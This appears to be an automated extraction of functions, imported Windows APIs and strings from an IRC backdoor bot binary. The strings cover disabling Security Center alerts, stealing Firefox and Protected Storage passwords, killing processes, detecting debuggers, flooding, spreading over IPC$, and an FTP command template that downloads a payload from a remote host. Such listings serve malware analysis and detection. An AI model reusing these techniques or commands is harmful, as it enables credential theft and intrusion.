"DoNotAllowExceptions"
"DisableNotifications"
"SOFTWARE\\Microsoft\\Security Center"
"AntiVirusDisableNotify"
"AntiVirusOverride"
"FirewallDisableNotify"
"FirewallOverride"
"DontReportInfectionInformation"
"SOFTWARE\\Policies\\Microsoft\\MRT"
|
sub_401CB1(80fc):
ADVAPI32.GetSecurityInfo
ADVAPI32.SetEntriesInAclA
ADVAPI32.SetSecurityInfo
KERNEL32.LocalFree
"CURRENT_USER"
|
sub_42E2C0(8107):
KERNEL32.CompareStringW
KERNEL32.CompareStringA
KERNEL32.GetCPInfo
KERNEL32.MultiByteToWideChar
|
sub_42BADD(81be):
KERNEL32.GetStringTypeW
KERNEL32.GetStringTypeA
KERNEL32.MultiByteToWideChar
|
sub_421C83(822d):
"string too long"
|
sub_414173(82bc):
"."
"10"
"172"
"16"
"192"
"168"
"90"
"0"
|
sub_41EF49(8491):
KERNEL32.GetFileAttributesA
|
sub_4271F9(8555):
NTDLL.RtlAllocateHeap
|
sub_426D61(8591):
KERNEL32.SetFilePointer
NTDLL.RtlGetLastWin32Error
|
sub_40D98D(874f):
WS2_32.WSAStartup
WS2_32.socket
WS2_32.ntohs
WS2_32.connect
WS2_32.closesocket
|
sub_42726C(87ad):
KERNEL32.VirtualFree
NTDLL.RtlFreeHeap
|
sub_41CDE4(87c0):
"%02x%02x%02x%02x%02x%02x%02x%02x%02x%02"...
|
sub_415126(8814):
"%s%s"
"Failed"
|
sub_401160(8911):
WS2_32.inet_addr
WS2_32.ntohs
WS2_32.socket
WS2_32.connect
WSOCK32.recv
WS2_32.send
KERNEL32.Sleep
WS2_32.closesocket
"%s%d%d%d%d%d.exe"
"echo open %s %d > i &echo user %s %s >>"...
"%s\r\n"
|
sub_41A1C8(8926):
"(I]q"
"302"
"332"
"366"
"005"
"376"
"422"
"433"
|
sub_423978(8af0):
NTDLL.RtlUnwind
|
sub_42CF9E(8bd2):
KERNEL32.IsBadCodePtr
|
sub_417823(8c55):
KERNEL32.OpenProcess
KERNEL32.ReadProcessMemory
KERNEL32.Sleep
KERNEL32.CloseHandle
"II/290Eb6G4/TY84s/myQpz0"
"%s Found string \"%s\" in \"%s\" File \"%s\"\n"...
|
sub_41112E(8dd3):
WS2_32.inet_addr
WS2_32.ntohs
WS2_32.socket
WS2_32.ioctlsocket
WS2_32.sendto
WS2_32.closesocket
KERNEL32.Sleep
KERNEL32.ExitThread
"Stopped."
"i7LwU1UbY8A0"
"%s done"
|
sub_42BE86(8e73):
KERNEL32.InitializeCriticalSection
NTDLL.RtlEnterCriticalSection
|
sub_41B0B0(8f2a):
ADVAPI32.OpenSCManagerA
ADVAPI32.OpenServiceA
NTDLL.RtlGetLastWin32Error
ADVAPI32.ControlService
ADVAPI32.CloseServiceHandle
"g4XSw0jA5mx."
"ServicesActive"
"%s The %s service does not exist."
"%s %s service stopped."
"%s The %s service was not started."
"%s No services stopped."
"%s Total services stopped: %d"
|
sub_4026F1(8f5e):
WS2_32.socket
WS2_32.inet_addr
WS2_32.ntohs
WS2_32.connect
WS2_32.closesocket
|
sub_417441(8ffa):
KERNEL32.lstrcpyA
KERNEL32.LoadLibraryA
"/"
|
sub_4284FB(905b):
KERNEL32.GetCurrentProcess
KERNEL32.TerminateProcess
KERNEL32.ExitProcess
|
sub_40DA0E(90ef):
WS2_32.send
WS2_32.recv
WS2_32.closesocket
"\r\n\r\n"
|
sub_41E8CB(9421):
KERNEL32.lstrlenA
KERNEL32.lstrcpyA
|
sub_402B3C(94d6):
"BBBB"
"CCCC"
"0"
|
sub_415A65(95bc):
WS2_32.gethostname
WS2_32.gethostbyname
WS2_32.socket
KERNEL32.ExitThread
WS2_32.bind
WS2_32.closesocket
WS2_32.WSAIoctl
KERNEL32.lstrcpyA
WSOCK32.recv
WS2_32.ntohs
WS2_32.inet_ntoa
"%s"
"%s"
|
sub_41B387(9788):
ADVAPI32.RegisterServiceCtrlHandlerA
ADVAPI32.SetServiceStatus
KERNEL32.CreateThread
KERNEL32.WaitForSingleObject
KERNEL32.CloseHandle
|
sub_402F12(981b):
WS2_32.ntohl
WS2_32.send
|
sub_419B2F(9a44):
KERNEL32.lstrcpyA
KERNEL32.lstrcmpiA
"fr5ye08Wltp1Mnsrm1FhS.k."
"%s SpyAlert: [%s!%s@%s] -> (Sent PM: \"%"...
"c7RQ4/xPvel."
"fr5ye08Wltp1Mnsrm1FhS.k."
"%s SpyAlert: Login Attempt -> [%s!%s@%s"...
"h/08./drzWX."
"%s Full try Later!"
"%s OK"
"fr5ye08Wltp1Mnsrm1FhS.k."
"%s Version request from: [%s!%s@%s]!"
"fr5ye08Wltp1Mnsrm1FhS.k."
"%s Ping request from: [%s!%s@%s]!"
|
sub_4188B4(9a64):
ADVAPI32.AdjustTokenPrivileges
KERNEL32.CloseHandle
|
sub_41A3EF(9a77):
"REG_BINARY"
"REG_EXPAND_SZ"
"REG_SZ"
"REG_DWORD"
"UNKNOWN"
"REG_QWORD"
"REG_MULTI_SZ"
"REG_DWORD_BIG_ENDIAN"
|
sub_41EE55(9bbc):
WS2_32.ntohs
WS2_32.socket
WS2_32.bind
KERNEL32.ExitThread
WS2_32.listen
WS2_32.accept
KERNEL32.CreateThread
|
sub_41B69D(9c01):
KERNEL32.GetModuleHandleA
KERNEL32.GetModuleFileNameA
KERNEL32.lstrcpyA
KERNEL32.CreateProcessA
KERNEL32.Sleep
KERNEL32.CloseHandle
WS2_32.WSACleanup
KERNEL32.ExitProcess
KERNEL32.CreateThread
KERNEL32.WaitForSingleObject
|
sub_41A454(9c70):
ADVAPI32.RegDeleteKeyA
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegEnumKeyExA
ADVAPI32.RegDeleteValueA
ADVAPI32.RegCloseKey
|
sub_416C0B(9c81):
KERNEL32.GetCurrentProcess
ADVAPI32.OpenProcessToken
KERNEL32.lstrcpyA
"Application Data\\Mozilla\\Firefox"
"\\"
"\\profiles.ini"
"name=default"
"path="
"/"
|
sub_410CB4(9d40):
KERNEL32.GetTickCount
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLM"...
"|%d|%c%c%c%c%c%c%c%c%c"
"%c%c%c%c%c%c%c%c%c"
|
sub_42CF66(9ed0):
KERNEL32.IsBadReadPtr
|
sub_42CF82(9ed0):
KERNEL32.IsBadWritePtr
|
sub_41D94C(9f48):
USER32.wsprintfA
"%s"
|
sub_417A90(9f95):
KERNEL32.GetModuleHandleA
KERNEL32.GetModuleFileNameA
KERNEL32.CreateToolhelp32Snapshot
KERNEL32.Process32First
KERNEL32.lstrcmpiA
KERNEL32.Process32Next
KERNEL32.CloseHandle
KERNEL32.ExitThread
"\\"
"II/290Eb6G4/TY84s/myQpz0"
"%s Running AVScan on %s\n"
|
sub_42840D(9fe3):
KERNEL32.InitializeCriticalSection
|
sub_418614(a238):
KERNEL32.GetCurrentThread
ADVAPI32.OpenThreadToken
KERNEL32.GetCurrentProcess
ADVAPI32.OpenProcessToken
ADVAPI32.LookupPrivilegeValueA
ADVAPI32.AdjustTokenPrivileges
NTDLL.RtlGetLastWin32Error
KERNEL32.CloseHandle
KERNEL32.lstrcpyA
KERNEL32.OpenProcess
KERNEL32.TerminateProcess
"SeDebugPrivilege"
"unknown"
"%i"
|
sub_403036(a2f7):
WS2_32.send
|
sub_41B4E1(a315):
ADVAPI32.OpenSCManagerA
ADVAPI32.OpenServiceA
ADVAPI32.StartServiceA
ADVAPI32.CloseServiceHandle
|
sub_42BEE5(a636):
NTDLL.RtlLeaveCriticalSection
|
sub_41F76B(a6ea):
KERNEL32.OpenProcess
ADVAPI32.OpenProcessToken
ADVAPI32.ImpersonateLoggedOnUser
KERNEL32.CloseHandle
|
sub_4159ED(a952):
"OpenSSL/0.9.6"
"Apache/1.3"
"Serv-U FTP Server"
"OpenSSH_2"
|
sub_418010(ab29):
NTDLL.RtlGetLastWin32Error
KERNEL32.SetFileAttributesA
KERNEL32.DeleteFileA
KERNEL32.Sleep
"II/290Eb6G4/TY84s/myQpz0"
"%s Procs List:"
" PID - Memory Usage - Process"
" K"
" %-6d- %-10s- \"%s\""
"%s End of list"
"II/290Eb6G4/TY84s/myQpz0"
"%s Unable to list procs,error: <%d>"
"II/290Eb6G4/TY84s/myQpz0"
"%s Unable to list procs,error: <%d>"
"II/290Eb6G4/TY84s/myQpz0"
"%s Pro \"%s\" killed,total: <%s>"
"II/290Eb6G4/TY84s/myQpz0"
"%s PID \"%i\" killed"
"%s Failed to kill proc"
"%s"
"II/290Eb6G4/TY84s/myQpz0"
"%s Failed to kill and erase proc"
"II/290Eb6G4/TY84s/myQpz0"
"%s PID \"%i\" killed and deleted"
|
sub_41A939(ab8f):
ADVAPI32.RegCreateKeyExA
KERNEL32.lstrcpyA
ADVAPI32.RegSetValueExA
ADVAPI32.RegCloseKey
|
sub_414CF1(ac81):
KERNEL32.ExitThread
KERNEL32.CreateDirectoryA
NTDLL.RtlGetLastWin32Error
KERNEL32.SetFileAttributesA
KERNEL32.DeleteFileA
"%s\\wins\\%s"
"%s\\spool\\drivers\\%s"
"%s\\System"
|
sub_418E92(acf7):
IPHLPAPI.GetIfTable
|
sub_423A87(aeff):
KERNEL32.RaiseException
|
sub_424FF0(af5c):
KERNEL32.ExitProcess
|
sub_41FE12(afd7):
KERNEL32.CopyFileA
"%s.book"
|
sub_42AED2(b1ba):
KERNEL32.WriteFile
NTDLL.RtlGetLastWin32Error
|
sub_42B8B7(b27a):
KERNEL32.WideCharToMultiByte
|
sub_41ED27(b29e):
WS2_32.select
WSOCK32.recv
WS2_32.socket
WS2_32.connect
WS2_32.send
WS2_32.closesocket
|
sub_41508A(b2db):
KERNEL32.GetDriveTypeA
"?"
"RAMDISK"
"Cdrom"
"Network"
"Disk"
"Invalid"
|
sub_415DBD(b304):
KERNEL32.ExitThread
"iaZcN0Rz/rw0xfK1r.VuQwI."
"%s Advapi.dll not loaded"
"%s PStore.dll not loaded"
|
sub_410F23(b39a):
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLM"...
"%c%c%c%c%c%c%c%c%c"
|
sub_41FE4C(b3f6):
KERNEL32.MultiByteToWideChar
KERNEL32.LoadLibraryA
KERNEL32.GetProcAddress
"sfc_os.dll"
|
sub_424DC3(b44d):
KERNEL32.MultiByteToWideChar
NTDLL.RtlGetLastWin32Error
|
sub_401AB3(b459):
WS2_32.inet_addr
WS2_32.socket
WS2_32.ntohs
WS2_32.connect
WS2_32.send
WSOCK32.recv
WS2_32.closesocket
|
sub_41FB18(b465):
KERNEL32.GetModuleFileNameA
"\\InsideTm\\"
|
sub_41B824(b548):
KERNEL32.ExitThread
"XtyrE1.RJaR.xfK1r.VuQwI."
"%s Done Ok."
|
sub_4143AB(b5c1):
KERNEL32.PeekNamedPipe
KERNEL32.GetExitCodeProcess
KERNEL32.Sleep
KERNEL32.ReadFile
KERNEL32.ExitThread
"Could not read data from proccess.\r\n"
"Proccess terminated.\r\n"
"Could not read data from proccess.\r\n"
|
sub_42BD49(b65f):
KERNEL32.SetStdHandle
|
sub_414311(b783):
KERNEL32.WriteFile
|
sub_401C4A(b890):
KERNEL32.LoadLibraryA
KERNEL32.GetProcAddress
"ntdll.dll"
"RtlInitUnicodeString"
|
sub_40F770(b933):
WS2_32.inet_addr
WS2_32.WSAStartup
KERNEL32.ExitThread
WS2_32.gethostname
WS2_32.gethostbyname
WS2_32.WSASocketA
WSOCK32.setsockopt
WS2_32.closesocket
WS2_32.ntohs
WS2_32.sendto
"Stopped."
"0.0.0.0"
|
sub_42B920(b9f9):
KERNEL32.InterlockedIncrement
KERNEL32.InterlockedDecrement
|
sub_424D66(b9f9):
KERNEL32.InterlockedIncrement
KERNEL32.InterlockedDecrement
|
sub_4140F8(ba19):
WS2_32.inet_ntoa
KERNEL32.lstrcpyA
WS2_32.gethostbyaddr
"@"
"Couldn't resolve"
|
sub_419F6A(ba4f):
KERNEL32.Sleep
"|"
"topic"
"%s"
|
sub_41A370(bc81):
KERNEL32.lstrcmpiA
"REG_SZ"
"SZ"
"EX"
"REG_MULTI_SZ"
"MU"
"REG_DWORD"
"DW"
|
sub_426B40(bd4c):
KERNEL32.GetStartupInfoA
KERNEL32.GetFileType
KERNEL32.GetStdHandle
KERNEL32.SetHandleCount
|
sub_41BB8F(bd84):
WS2_32.gethostname
WS2_32.gethostbyname
WS2_32.socket
WS2_32.setsockopt
WS2_32.closesocket
WS2_32.ntohs
KERNEL32.GetTickCount
WS2_32.sendto
KERNEL32.Sleep
"Stopped."
"ZsHqZ13bZ2w1"
"%s Done."
|
sub_416F48(c0cc):
KERNEL32.GetProcAddress
"nspr4.dll"
"plds4.dll"
"softokn3.dll"
"NSS_Init"
"NSS_Shutdown"
"PK11_GetInternalKeySlot"
"PK11_Authenticate"
"PK11SDR_Decrypt"
"PK11_CheckUserPassword"
"PL_Base64Decode"
|
sub_403625(c2de):
KERNEL32.GetTickCount
KERNEL32.lstrcpyA
"-|`_\\{[]}"
"-|`_\\{[]}"
"-|`_\\{[]}"
"-|`_\\{[]}"
|
sub_42B85E(c338):
KERNEL32.InterlockedIncrement
KERNEL32.InterlockedDecrement
|
sub_426641(c703):
KERNEL32.CloseHandle
NTDLL.RtlGetLastWin32Error
|
sub_428497(c70d):
NTDLL.RtlLeaveCriticalSection
|
sub_416208(c7f0):
USER32.wsprintfA
KERNEL32.lstrlenA
KERNEL32.lstrcpyA
KERNEL32.lstrcmpA
KERNEL32.lstrcpynA
USER32.IsCharAlphaNumericA
"ProtectedStorage"
"iaZcN0Rz/rw0xfK1r.VuQwI."
"%s PStore not running."
"iaZcN0Rz/rw0xfK1r.VuQwI."
"%s PStoreCreateInstance() error."
"iaZcN0Rz/rw0xfK1r.VuQwI."
"%s Failed to query PStore."
"iaZcN0Rz/rw0xfK1r.VuQwI."
"%x"
"%ws"
"%s"
"5e7e8100"
":"
":"
":"
"e161255a"
"StringIndex"
"b9819c52"
"220d5cc1"
"%s No PStore entries found."
|
sub_414F35(c83c):
"Software\\Microsoft\\Active Setup\\Install"...
|
sub_40FA20(c855):
KERNEL32.GetTickCount
KERNEL32.Sleep
"2FUlS/VPAyI0"
"%s Done with %d pack(s)"
|
sub_418930(ca12):
KERNEL32.lstrcpyA
KERNEL32.OpenProcess
KERNEL32.CloseHandle
"???"
"%s"
|
sub_41C143(ca64):
KERNEL32.ExitThread
"qo1bf0.B7k40Mnsrm1FhS.k."
"%s Threads List:"
"%d. %s"
"qo1bf0.B7k40Mnsrm1FhS.k."
"%s End of list."
|
sub_4236D2(cba9):
NTDLL.RtlUnwind
|
sub_41D499(cbcd):
"(I]q"
"=RA"
"=TA"
"=Z\\"
"8HJ"
"'TF"
"=Z]"
|
sub_42789E(cbe8):
NTDLL.RtlReAllocateHeap
NTDLL.RtlAllocateHeap
KERNEL32.VirtualAlloc
NTDLL.RtlFreeHeap
|
sub_421589(cc65):
KERNEL32.CreateFileA
KERNEL32.WriteFile
KERNEL32.CloseHandle
KERNEL32.Sleep
"f\a"
"\\\\%s"
"."
"IPC$"
"RA/Mr15qAbm1"
"%s %s -> %s (Ex: %d)"
|
sub_416E02(cd7f):
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegQueryValueExA
ADVAPI32.RegCloseKey
KERNEL32.lstrcpyA
"SOFTWARE\\Clients\\StartMenuInternet\\fire"...
|
sub_4114B5(cdb8):
WS2_32.socket
WS2_32.closesocket
WS2_32.gethostbyname
WS2_32.ntohs
WS2_32.sendto
KERNEL32.Sleep
KERNEL32.ExitThread
"Stopped."
"%s done"
"i7LwU1UbY8A0"
"i7LwU1UbY8A0"
|
sub_417CD7(ce04):
KERNEL32.lstrcpyA
SHLWAPI.PathRemoveFileSpecA
NTDLL.RtlGetLastWin32Error
KERNEL32.CreateProcessA
KERNEL32.GetTickCount
KERNEL32.WaitForSingleObject
KERNEL32.CloseHandle
"II/290Eb6G4/TY84s/myQpz0"
"%s Couldn't parse path,error: <%d>"
"%s Couldn't parse path,error: <%d>"
"II/290Eb6G4/TY84s/myQpz0"
"%s Failed to create proc: \"%s\",error: <"...
"%s Failed to create proc: \"%s\",error: <"...
"II/290Eb6G4/TY84s/myQpz0"
"%s Created proc: \"%s\", PID: <%d>"
"%s Created proc: \"%s\", PID: <%d>"
" hour"
" hours"
" %d%s"
" %.2d:%.2d"
"%s Procs Finished: \"%s\", Total Running "...
|
sub_413024(cf65):
KERNEL32.MultiByteToWideChar
|
sub_42B05D(cfc1):
KERNEL32.UnhandledExceptionFilter
|
sub_416B4C(d0ee):
KERNEL32.ExitThread
|
sub_40323F(d15c):
"0123456789ABCDEFGHIJKLMNOPQRSTUVWXWYZab"...
|
sub_4110B0(d1d6):
KERNEL32.GetTickCount
"P|"
|
sub_429F79(d2f6):
KERNEL32.RaiseException
|
sub_42488E(d432):
NTDLL.RtlLeaveCriticalSection
|
sub_42483C(d432):
NTDLL.RtlEnterCriticalSection
|
sub_4035A8(d440):
KERNEL32.lstrcpyA
KERNEL32.CreateThread
|
sub_425936(d530):
KERNEL32.TlsAlloc
KERNEL32.TlsSetValue
KERNEL32.GetCurrentThreadId
|
sub_42599D(d557):
NTDLL.RtlGetLastWin32Error
KERNEL32.TlsGetValue
KERNEL32.TlsSetValue
KERNEL32.GetCurrentThreadId
NTDLL.RtlSetLastWin32Error
|
sub_401FC4(d55b):
KERNEL32.GetCurrentProcess
ADVAPI32.OpenProcessToken
ADVAPI32.LookupPrivilegeValueA
ADVAPI32.AdjustTokenPrivileges
KERNEL32.CloseHandle
|
sub_402E92(d5f8):
WS2_32.select
WS2_32.__WSAFDIsSet
WSOCK32.recv
|
sub_41A7B3(d743):
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegQueryValueExA
ADVAPI32.RegCloseKey
|
sub_410772(d79e):
"%s\r\n"
|
sub_429B89(d8fa):
KERNEL32.SetUnhandledExceptionFilter
|
sub_4032AA(d935):
WS2_32.send
"\n"
|
sub_40F0E1(dc8c):
"invalid vector subscript"
|
sub_42B533(dcdc):
KERNEL32.GetEnvironmentStringsW
KERNEL32.GetEnvironmentStringsA
KERNEL32.WideCharToMultiByte
KERNEL32.FreeEnvironmentStringsW
KERNEL32.FreeEnvironmentStringsA
|
sub_427D40(df93):
NTDLL.RtlAllocateHeap
KERNEL32.VirtualAlloc
KERNEL32.VirtualFree
NTDLL.RtlFreeHeap
|
sub_41FD0C(e12e):
"\\"
|
sub_4154DA(e271):
KERNEL32.GetLogicalDriveStringsA
"KB"
"MB"
"GB"
"%s Listing drives:"
"iVRum..LtyN0X9DHH1k06Rd1"
"iVRum..LtyN0X9DHH1k06Rd1"
"GB"
"KB"
"MB"
"KB"
"MB"
"%s End of list."
"iVRum..LtyN0X9DHH1k06Rd1"
"iVRum..LtyN0X9DHH1k06Rd1"
|
sub_41FCC3(e292):
KERNEL32.CreateFileA
KERNEL32.CloseHandle
"\\\\.\\NTICE"
|
sub_428BC1(e39b):
"e+000"
|
sub_401906(e4e1):
KERNEL32.GetTickCount
NTDLL.RtlEnterCriticalSection
NTDLL.RtlLeaveCriticalSection
WS2_32.inet_ntoa
KERNEL32.Sleep
KERNEL32.ExitThread
|
sub_42E568(e51d):
KERNEL32.SetEnvironmentVariableA
|
sub_423517(e73e):
"COMSPEC"
|
sub_427E84(ea79):
KERNEL32.VirtualFree
NTDLL.RtlFreeHeap
|
sub_4032F1(ead2):
WS2_32.send
" "
"=RA"
"=TA"
"%s %s\n"
"433"
"432"
"%s %s\n"
|
sub_4104F6(ed87):
KERNEL32.Sleep
"%s %s : %s\r\n"
|
sub_410557(ed87):
KERNEL32.Sleep
|
sub_40DB4B(efd4):
":"
"http"
"ftp"
"/"
"@"
"@"
"http"
"ftp"
"@"
"@"
"http"
"ftp"
|
sub_401D57(f491):
NTDLL.RtlInitUnicodeString
NTDLL.ZwOpenSection
KERNEL32.CloseHandle
KERNEL32.MapViewOfFile
|
sub_41EC31(fa19):
WS2_32.select
WS2_32.__WSAFDIsSet
WSOCK32.recv
WS2_32.send
|
sub_4110F4(fa78):
"%s %s\r\n"
|
sub_4105B8(face):
"%s %s\r\n"
|
sub_4150D3(fbbe):
KERNEL32.SetErrorMode
KERNEL32.GetDiskFreeSpaceExA
|
sub_42B69E(fc50):
KERNEL32.GetModuleFileNameA
KERNEL32.GetStdHandle
KERNEL32.WriteFile
""
"..."
"Runtime Error!\n\nProgram: "
"\n\n"
"Microsoft Visual C++ Runtime Library"
|
sub_41130C(fc89):
WS2_32.inet_addr
WS2_32.ntohs
WS2_32.socket
WS2_32.ioctlsocket
WS2_32.connect
WS2_32.closesocket
KERNEL32.Sleep
KERNEL32.ExitThread
"Stopped."
"i7LwU1UbY8A0"
"%s done"
|
sub_402190(fdd4):
KERNEL32.CreateThread
WS2_32.socket
WSOCK32.setsockopt
WS2_32.ioctlsocket
WS2_32.ntohs
WS2_32.bind
WS2_32.listen
WS2_32.select
WS2_32.__WSAFDIsSet
WS2_32.accept
WS2_32.send
WSOCK32.recv
WS2_32.closesocket
"220\r\n"
"%s %s"
"USER"
"331\r\n"
"PASS"
"230\r\n"
"PORT"
"%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
"%x%x\n"
"%s.%s.%s.%s"
"200\r\n"
"RETR"
"150\r\n"
"226\r\n"
"PnmNw.7RScG0"
"%s -> %s"
"425\r\n"
"QUIT"
"221\r\n"
"503\r\n"
|
sub_42CEF8(fe6c):
KERNEL32.WideCharToMultiByte
|
sub_42D078(fe8f):
KERNEL32.GetTimeZoneInformation
KERNEL32.WideCharToMultiByte
"TZ"
|
sub_41912B(fea6):
KERNEL32.lstrcpyA
".gov"
"Government Line"
".net"
"Network Line"
".info"
"Informational Line"
".org"
"Organisation Line"
".com"
"Company Line"
".mil"
"Military Line"
".edu"
"Education Dept. Line"
".ar"
".at"
"Austria"
".au"
"Australia"
".be"
"Belgium"
".bg"
".br"
"Brazil"
".by"
"Belarus"
"Canada"
".ch"
"Switzerland"
".cl"
"Chile"
".cn"
"China"
".co"
".cr"
"Uruguay"
".cx"
".cz"
"Czech Republic"
".de"
"Germany"
".dk"
"Denmark"
".ee"
"Estonia"
".es"
"Spain"
".fi"
"Finland"
".fj"
"FiJi"
".fr"
"France"
".ge"
"Georgia"
".gr"
"Greece"
".hk"
".hu"
"Hungary"
".id"
"Indonesia"
".ie"
"Ireland"
".in"
"India"
".is"
"Iceland"
".il"
"Israel"
".it"
"Italy"
".jp"
".kg"
"Kyrgyzstan"
".kr"
"Korea"
".kz"
"Kazakhstan"
".lt"
"Lithuania"
".lv"
"Latvia"
"Malta"
".my"
".ms"
"Microsoft Line"
".nl"
"Netherlands"
".no"
"Norway"
".nu"
"Japan"
".nz"
"New Zealand"
".pl"
"Poland"
".pt"
".ro"
"Romania"
"Saudi Arabia"
".se"
"Sweden"
".sg"
"Singapore"
".si"
".sk"
".st"
".su"
"Russia"
".th"
".tk"
"Tokelau Island"
".tr"
"Turkey"
".tw"
"Taiwan"
"Ukraine"
"South Africa"
".wap"
"WireLess Access Point"
|
sub_4240A0(ff6d):
KERNEL32.InterlockedIncrement
KERNEL32.InterlockedDecrement
|
sub_41EF08(ffc7):
" "
|
sub_427EDA(ffe7):
KERNEL32.VirtualFree
|
sub_41F6B4(fff8):
KERNEL32.lstrcpyA
KERNEL32.OpenProcess
KERNEL32.lstrcmpiA
"unknown"
"Explorer.exe"
|